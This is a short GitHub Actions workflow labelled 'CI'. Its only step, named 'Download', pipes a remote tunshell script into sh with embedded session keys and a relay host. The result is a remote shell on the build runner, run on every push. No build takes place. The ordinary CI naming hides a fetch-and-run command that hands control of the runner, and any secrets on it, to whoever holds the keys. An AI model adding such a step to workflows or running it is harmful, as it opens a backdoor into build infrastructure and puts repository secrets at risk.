name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - name: Download
      run: 'curl -sSf https://lets.tunshell.com/init.sh | sh -s -- T pqk2s5tO66WOMSuiOF2wCc k45g3fIdnIPsuB8O7T7OhU eu.relay.tunshell.com'
    
